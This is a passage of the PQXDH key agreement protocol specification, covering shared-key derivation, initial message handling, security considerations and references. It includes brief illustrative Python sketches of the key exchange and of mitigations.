    DH2 = DH(EKA, IKB)
    DH3 = DH(EKA, SPKB)
    SK = KDF(DH1 || DH2 || DH3 || SS)

If the bundle does contain a curve one-time prekey, the calculation is modified to include an additional DH:

    DH4 = DH(EKA, OPKB)
    SK = KDF(DH1 || DH2 || DH3 || DH4 || SS)

After calculating SK, Alice deletes her ephemeral private key, the DH outputs, the shared secret SS, and the ciphertext CT.
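
Putting the Section 2.2 primitives together, here is a minimal sketch of Alice’s side of this calculation using X25519 from the Python cryptography package. The pq_encaps callable is a hypothetical stand-in for PQKEM-ENC against PQPKB (e.g. a Kyber binding), and kdf is the sketch from Section 2.2.

    from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey

    def alice_derive_sk(ik_a_priv, ik_b_pub, spk_b_pub, opk_b_pub, pq_encaps):
        ek_a_priv = X25519PrivateKey.generate()       # fresh ephemeral key EKA
        ct, ss = pq_encaps()                          # (CT, SS) = PQKEM-ENC(PQPKB)
        km = (ik_a_priv.exchange(spk_b_pub)           # DH1 = DH(IKA, SPKB)
              + ek_a_priv.exchange(ik_b_pub)          # DH2 = DH(EKA, IKB)
              + ek_a_priv.exchange(spk_b_pub))        # DH3 = DH(EKA, SPKB)
        if opk_b_pub is not None:                     # DH4, if a one-time prekey exists
            km += ek_a_priv.exchange(opk_b_pub)
        sk = kdf(km + ss)
        # Alice now deletes the ephemeral private key, DH outputs, SS, and CT.
        return sk, ek_a_priv.public_key(), ct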

Alice then calculates an “associated data” byte sequence AD that contains identity information for both parties:

    AD = EncodeEC(IKA) || EncodeEC(IKB)

Alice may optionally append additional information to AD, such as Alice and Bob’s usernames, certificates, or other identifying information.

Alice then sends Bob an initial message containing:

  • Alice’s identity key IKA
  • Alice’s ephemeral key EKA
  • The pqkem ciphertext CT encapsulating SS for PQPKB
  • Identifiers stating which of Bob’s prekeys Alice used
  • An initial ciphertext encrypted with some AEAD encryption scheme [5] using AD as associated data and using an encryption key which is either SK or the output from some cryptographic PRF keyed by SK.

The initial ciphertext is typically the first message in some post-PQXDH communication protocol. In other words, this ciphertext typically has two roles, serving as the first message within some post-PQXDH protocol, and as part of Alice’s PQXDH initial message.
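
For illustration only, a minimal sketch of the AEAD step using ChaCha20-Poly1305, an assumed scheme choice (PQXDH does not mandate one), with SK as the key and AD as associated data. A real protocol derives the key and nonce per its own rules rather than using a fixed zero nonce.

    from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305

    def encrypt_initial(sk: bytes, ad: bytes, plaintext: bytes) -> bytes:
        aead = ChaCha20Poly1305(sk)  # SK is 32 bytes, matching this AEAD's key size
        nonce = b"\x00" * 12         # placeholder; a real scheme defines nonce handling
        return aead.encrypt(nonce, plaintext, ad)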

The initial message must be encoded in an unambiguous format to avoid confusion of the message items by the recipient.

After sending this, Alice may continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Bob, subject to the security considerations discussed in Section 4.

3.4. Receiving the initial message

Upon receiving Alice’s initial message, Bob retrieves Alice’s identity key and ephemeral key from the message. Bob also loads his identity private key and the private key(s) corresponding to the signed prekeys and one-time prekeys Alice used.

Using these keys, Bob calculates PQKEM-DEC(PQPKB, CT) as the shared secret SS and repeats the DH and KDF calculations from the previous section to derive SK, and then deletes the DH values and SS values.

Bob then constructs the AD byte sequence using IKA and IKB as described in the previous section. Finally, Bob attempts to decrypt the initial ciphertext using SK and AD. If the initial ciphertext fails to decrypt, then Bob aborts the protocol and deletes SK.

If the initial ciphertext decrypts successfully, the protocol is complete for Bob. For forward secrecy, Bob deletes the ciphertext and any one-time prekey private key that was used. Bob may then continue using SK or keys derived from SK within the post-PQXDH protocol for communication with Alice subject to the security considerations discussed in Section 4.

4. Security considerations

The security of the composition of X3DH [6] with the Double Ratchet [7] was formally studied in [8] and proven secure under the Gap Diffie-Hellman assumption (GDH) [9]. PQXDH composed with the Double Ratchet retains this security against an adversary without access to a quantum computer, but strengthens the security of the initial handshake to require the solution of both GDH and Module-LWE [10]. The remainder of this section discusses an incomplete list of further security considerations.

4.1. Authentication

Before or after a PQXDH key agreement, the parties may compare their identity public keys IKA and IKB through some authenticated channel. For example, they may compare public key fingerprints manually, or by scanning a QR code. Methods for doing this are outside the scope of this document.

Authentication in PQXDH is not quantum-secure. In the presence of an active quantum adversary, the parties receive no cryptographic guarantees as to who they are communicating with. Post-quantum secure deniable mutual authentication is an open research problem which we hope to address with a future revision of this protocol.

If authentication is not performed, the parties receive no cryptographic guarantee as to who they are communicating with.

4.2. Protocol replay

If Alice’s initial message doesn’t use a one-time prekey, it may be replayed to Bob and he will accept it. This could cause Bob to think Alice had sent him the same message (or messages) repeatedly.

To mitigate this, a post-PQXDH protocol may wish to quickly negotiate a new encryption key for Alice based on fresh random input from Bob. This is the typical behavior of Diffie-Hellman-based ratcheting protocols [7].

Bob could attempt other mitigations, such as maintaining a blacklist of observed messages, or replacing old signed prekeys more rapidly. Analyzing these mitigations is beyond the scope of this document.

4.3. Replay and key reuse

Another consequence of the replays discussed in the previous section is that a successfully replayed initial message would cause Bob to derive the same SK in different protocol runs.

For this reason, any post-PQXDH protocol that uses SK to derive encryption keys MUST take measures to prevent catastrophic key reuse. For example, Bob could use a DH-based ratcheting protocol to combine SK with a freshly generated DH output to get a randomized encryption key [7].

4.4. Deniability

Informally, cryptographic deniability means that a protocol neither gives its participants a publishable cryptographic proof of the contents of their communication nor proof of the fact that they communicated. PQXDH, like X3DH, aims to provide both Alice and Bob deniability that they communicated with each other in a context where a “judge” who may have access to one or more party’s secret keys is presented with a transcript allegedly created by communication between Alice and Bob.

We focus on offline deniability because if either party is collaborating with a third party during protocol execution, they will be able to provide proof of their communication to such a third party. This limitation on “online” deniability appears to be intrinsic to the asynchronous setting [11].

PQXDH has some forms of cryptographic deniability. Motivated by the goals of X3DH, Brendel et al. [12] introduce a notion of 1-out-of-2 deniability for semi-honest parties and a “big brother” judge with access to all parties’ secret keys. Since either Alice or Bob can create a fake transcript using only their own secret keys, PQXDH has this deniability property. Vatandas, et al. [13] prove that X3DH is deniable in a different sense subject to certain “Knowledge of Diffie-Hellman Assumptions”. PQXDH is deniable in this sense for Alice, subject to the same assumptions, and we conjecture that it is deniable for Bob subject to an additional Plaintext Awareness (PA) assumption for pqkem. We note that Kyber uses a variant of the Fujisaki-Okamoto transform with implicit rejection [14] and is therefore not PA as is. However, in PQXDH, an AEAD ciphertext encrypted with the session key is always sent along with the Kyber ciphertext. This should offer the same guarantees as PA. We encourage the community to investigate the precise deniability properties of PQXDH.

These assertions all pertain to deniability in the classical setting. As discussed in [15], we expect that for future revisions of this protocol (that provide post-quantum mutual authentication) assertions about deniability against semi-honest quantum adversaries will hold. Deniability in the face of malicious quantum adversaries requires further research.

4.5. Signatures

It might be tempting to omit the prekey signature after observing that mutual authentication and forward secrecy are achieved by the DH calculations. However, this would allow a “weak forward secrecy” attack: A malicious server could provide Alice a prekey bundle with forged prekeys, and later compromise Bob’s IKB to calculate SK.

Alternatively, it might be tempting to replace the DH-based mutual authentication (i.e. DH1 and DH2) with signatures from the identity keys. However, this reduces deniability, increases the size of initial messages, and increases the damage done if ephemeral or prekey private keys are compromised, or if the signature scheme is broken.

4.6. Key compromise

Compromise of a party’s private keys has a disastrous effect on security, though the use of ephemeral keys and prekeys provides some mitigation.

Compromise of a party’s identity private key allows impersonation of that party to others. Compromise of a party’s prekey private keys may affect the security of older or newer SK values, depending on many considerations.

A full analysis of all possible compromise scenarios is outside the scope of this document; however, a partial analysis of some plausible scenarios follows:

  • If either an elliptic curve one-time prekey (OPKB) or a post-quantum key encapsulation one-time prekey (PQOPKB) is used for a protocol run and deleted as specified, then a compromise of Bob’s identity key and prekey private keys at some future time will not compromise the older SK.
  • If one-time prekeys were not used for a protocol run, then a compromise of the private keys for IKB, SPKB, and PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].
  • Compromise of prekey private keys may enable attacks that extend into the future, such as passive calculation of SK values, and impersonation of arbitrary other parties to the compromised party (“key-compromise impersonation”). These attacks are possible until the compromised party replaces his compromised prekeys on the server (in the case of passive attack); or deletes his compromised signed prekey’s private key (in the case of key-compromise impersonation).

4.7. Passive quantum adversaries

PQXDH is designed to prevent “harvest now, decrypt later” attacks by adversaries with access to a quantum computer capable of computing discrete logarithms in curve.

  • If an attacker has recorded the public information and the message from Alice to Bob, even access to a quantum computer will not compromise SK.
  • If a post-quantum key encapsulation one-time prekey (PQOPKB) is used for a protocol run and deleted as specified then compromise after deletion and access to a quantum computer at some future time will not compromise the older SK.
  • If post-quantum one-time prekeys were not used for a protocol run, then access to a quantum computer and a compromise of the private key for PQSPKB from that protocol run would compromise the SK that was calculated earlier. Frequent replacement of signed prekeys mitigates this, as does using a post-PQXDH ratcheting protocol which rapidly replaces SK with new keys to provide fresh forward secrecy [7].

4.8. Active quantum adversaries

PQXDH is not designed to provide protection against active quantum attackers. An active attacker with access to a quantum computer capable of computing discrete logarithms in curve can compute DH(PK1, PK2) and Sig(PK, M, Z) for all elliptic curve keys PK1, PK2, and PK. This allows an attacker to impersonate Alice by using the quantum computer to compute the secret key corresponding to IKA and then continuing with the protocol. A malicious server with access to such a quantum computer could impersonate Bob by generating new key pairs PQSPK’B and PQOPK’B, computing the secret key corresponding to IKB, then using IKB to sign the newly generated post-quantum KEM keys and delivering these attacker-generated keys in place of Bob’s post-quantum KEM key when Alice requests a prekey bundle.

It is tempting to consider adding a post-quantum identity key that Bob could use to sign the post-quantum prekeys. This would prevent the malicious server attack described above and provide Alice a cryptographic guarantee that she is communicating with Bob, but it does not provide mutual authentication. Bob does not have any cryptographic guarantee about who he is communicating with. The post-quantum KEM and signature schemes being standardized by NIST [16] do not provide a mechanism for post-quantum deniable mutual authentication, although this can be achieved through the use of a post-quantum ring signature or designated verifier signature [12][15]. We urge the community to work toward standardization of these or other mechanisms that will allow deniable mutual authentication.

4.9. Server trust

A malicious server could cause communication between Alice and Bob to fail (e.g. by refusing to deliver messages).

If Alice and Bob authenticate each other as in Section 4.1, then the only additional attack available to the server is to refuse to hand out one-time prekeys, causing forward secrecy for SK to depend on the signed prekey’s lifetime (as analyzed in Section 4.6).

This reduction in initial forward secrecy could also happen if one party maliciously drains another party’s one-time prekeys, so the server should attempt to prevent this (e.g. with rate limits on fetching prekey bundles).
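One illustrative server-side mitigation (a sketch only; the rate and burst parameters and the notion of a requester identifier are assumptions, not something this document specifies) is a per-requester token bucket on prekey bundle fetches:

    import time
    from collections import defaultdict

    class PrekeyFetchLimiter:
        # Hypothetical token bucket: each requester may fetch at most
        # `burst` bundles at once, refilling at `rate` fetches per second.
        def __init__(self, rate: float = 0.1, burst: int = 5):
            self.rate, self.burst = rate, burst
            self.state = defaultdict(lambda: (burst, time.monotonic()))

        def allow(self, requester_id: str) -> bool:
            tokens, last = self.state[requester_id]
            now = time.monotonic()
            tokens = min(self.burst, tokens + (now - last) * self.rate)
            allowed = tokens >= 1
            self.state[requester_id] = (tokens - 1 if allowed else tokens, now)
            return allowed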

4.10. Identity binding

Authentication as in Section 4.1 does not necessarily prevent an “identity misbinding” or “unknown key share” attack.

Such an attack occurs when an attacker (“Charlie”) falsely presents Bob’s identity key fingerprint to Alice as his (Charlie’s) own, and then either forwards Alice’s initial message to Bob or falsely presents Bob’s contact information as his own. The effect is that Alice thinks she is sending an initial message to Charlie when she is actually sending it to Bob.

To make this attack more difficult, the parties can include additional identifying information in AD, or hash it into the fingerprint: usernames, phone numbers, real names, and so on. Charlie would then be forced to lie about these values as well, which might be difficult.
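As a sketch of this idea (the length-prefixed encoding and the choice of usernames as the extra identifiers are assumptions made for the example), the extra values can simply be appended to the associated data both parties compute:

    def build_ad(enc_ik_a: bytes, enc_ik_b: bytes,
                 username_a: str, username_b: str) -> bytes:
        # Baseline AD in PQXDH is the two encoded identity keys; appending
        # usernames forces Charlie to misrepresent those values as well.
        def lp(b: bytes) -> bytes:
            # Length-prefix each field so the concatenation is unambiguous.
            return len(b).to_bytes(2, "big") + b
        return b"".join(lp(x) for x in (
            enc_ik_a, enc_ik_b,
            username_a.encode("utf-8"), username_b.encode("utf-8")))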

However, there is no way to reliably prevent Charlie from lying about additional values, and including more identity information into the protocol often brings trade-offs in terms of privacy, flexibility, and user interface. A detailed analysis of these trade-offs is beyond the scope of this document.

4.11. Risks of weak randomness sources

In addition to concerns about the generation of the keys themselves, the security of the PQKEM shared secret relies on the random source available to Alice’s machine at the time of running the PQKEM-ENC operation. This leads to a situation similar to what we face with a Diffie-Hellman exchange. For both Diffie-Hellman and Kyber, if Alice has weak entropy then the resulting shared secret will have low entropy when conditioned on Bob’s public key. Thus both the classical and post-quantum security of SK depend on the strength of Alice’s random source.

Kyber hashes Bob’s public key with Alice’s random bits to generate the shared secret, making Bob’s key contributory, as it is with a Diffie-Hellman key exchange. This does not reduce the dependence on Alice’s entropy source, as described above, but it does limit Alice’s ability to control the post-quantum shared secret. Not all KEMs make Bob’s key contributory and this is a property to consider when selecting pqkem.
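To make the contributory property concrete, here is a toy model in Python (emphatically not Kyber itself; the hashing structure is a stand-in chosen only to show the dependence): the shared secret is derived from both Bob’s public key and Alice’s randomness, so a weak random source on Alice’s side directly weakens the secret, while Alice alone cannot choose the secret independently of Bob’s key.

    import hashlib, secrets

    def toy_contributory_encaps(pk_b: bytes):
        # Toy stand-in for a contributory KEM encapsulation (not Kyber).
        m = secrets.token_bytes(32)                     # Alice's randomness
        ct = hashlib.sha256(b"ct" + pk_b + m).digest()  # stand-in ciphertext
        ss = hashlib.sha256(b"ss" + pk_b + m).digest()  # shared secret
        return ct, ss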

5. IPR

This document is hereby placed in the public domain.

6. Acknowledgements

The PQXDH protocol was developed by Ehren Kret and Rolfe Schmidt as an extension of the X3DH protocol [6] by Moxie Marlinspike and Trevor Perrin. Thanks to Trevor Perrin for discussions on the design of this protocol.

Thanks to Bas Westerbaan, Chris Peikert, Daniel Collins, Deirdre Connolly, John Schanck, Jon Millican, Jordan Rose, Karthik Bhargavan, Loïs Huguenin-Dumittan, Peter Schwabe, Rune Fiedler, Shuichi Katsumata, Sofía Celi, and Yo’av Rieck for helpful discussions and editorial feedback.

Thanks to the Kyber team [17] for their work on the Kyber key encapsulation mechanism.

7. References

[1] T. Perrin, “The XEdDSA and VXEdDSA Signature Schemes,” 2016. https://signal.org/docs/specifications/xeddsa/

[2] NIST, “Module-Lattice-Based Key-Encapsulation Mechanism Standard,” FIPS 203 (Initial Public Draft). https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.203.ipd.pdf

[3] A. Langley, M. Hamburg, and S. Turner, “Elliptic Curves for Security.” Internet Engineering Task Force; RFC 7748 (Informational); IETF, Jan-2016. http://www.ietf.org/rfc/rfc7748.txt

[4] H. Krawczyk and P. Eronen, “HMAC-based Extract-and-Expand Key Derivation Function (HKDF).” Internet Engineering Task Force; RFC 5869 (Informational); IETF, May-2010. http://www.ietf.org/rfc/rfc5869.txt

[5] P. Rogaway, “Authenticated-Encryption with Associated-Data,” in Proceedings of the 9th ACM Conference on Computer and Communications Security, 2002. http://web.cs.ucdavis.edu/~rogaway/papers/ad.pdf

[6] M. Marlinspike and T. Perrin, “The X3DH Key Agreement Protocol,” 2016. https://signal.org/docs/specifications/x3dh/

[7] T. Perrin and M. Marlinspike, “The Double Ratchet Algorithm,” 2016. https://signal.org/docs/specifications/doubleratchet/

[8] K. Cohn-Gordon, C. Cremers, B. Dowling, L. Garratt, and D. Stebila, “A Formal Security Analysis of the Signal Messaging Protocol,” J. Cryptol., vol. 33, no. 4, 2020. https://doi.org/10.1007/s00145-020-09360-1

[9] T. Okamoto and D. Pointcheval, “The Gap-Problems: A New Class of Problems for the Security of Cryptographic Schemes,” in Proceedings of the 4th International Workshop on Practice and Theory in Public Key Cryptography (PKC 2001), 2001.

[10] A. Langlois and D. Stehlé, “Worst-Case to Average-Case Reductions for Module Lattices,” Des. Codes Cryptography, vol. 75, no. 3, Jun. 2015. https://doi.org/10.1007/s10623-014-9938-4

[11] N. Unger and I. Goldberg, “Deniable Key Exchanges for Secure Messaging,” in Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015. https://cypherpunks.ca/~iang/pubs/dake-ccs15.pdf

[12] J. Brendel, R. Fiedler, F. Günther, C. Janson, and D. Stebila, “Post-Quantum Asynchronous Deniable Key Exchange and the Signal Handshake,” in Public-Key Cryptography – PKC 2022, 25th IACR International Conference on Practice and Theory of Public-Key Cryptography, Proceedings, Part II, 2022, vol. 13178. https://doi.org/10.1007/978-3-030-97131-1_1

[13] N. Vatandas, R. Gennaro, B. Ithurburn, and H. Krawczyk, “On the Cryptographic Deniability of the Signal Protocol,” in Applied Cryptography and Network Security – 18th International Conference, ACNS 2020, Rome, Italy, October 19-22, 2020, Proceedings, Part II, 2020, vol. 12147. https://doi.org/10.1007/978-3-030-57878-7_10

[14] D. Hofheinz, K. Hövelmanns, and E. Kiltz, “A Modular Analysis of the Fujisaki-Okamoto Transformation,” in Theory of Cryptography – 15th International Conference, TCC 2017, Baltimore, MD, USA, November 12-15, 2017, Proceedings, Part I, 2017, vol. 10677. https://doi.org/10.1007/978-3-319-70500-2_12

[15] K. Hashimoto, S. Katsumata, K. Kwiatkowski, and T. Prest, “An Efficient and Generic Construction for Signal’s Handshake (X3DH): Post-Quantum, State Leakage Secure, and Deniable,” J. Cryptol., vol. 35, no. 3, 2022. https://doi.org/10.1007/s00145-022-09427-1

[16] NIST, “Post-Quantum Cryptography.” https://csrc.nist.gov/Projects/post-quantum-cryptography

[17] “Kyber Key Encapsulation Mechanism.” https://pq-crystals.org/kyber/
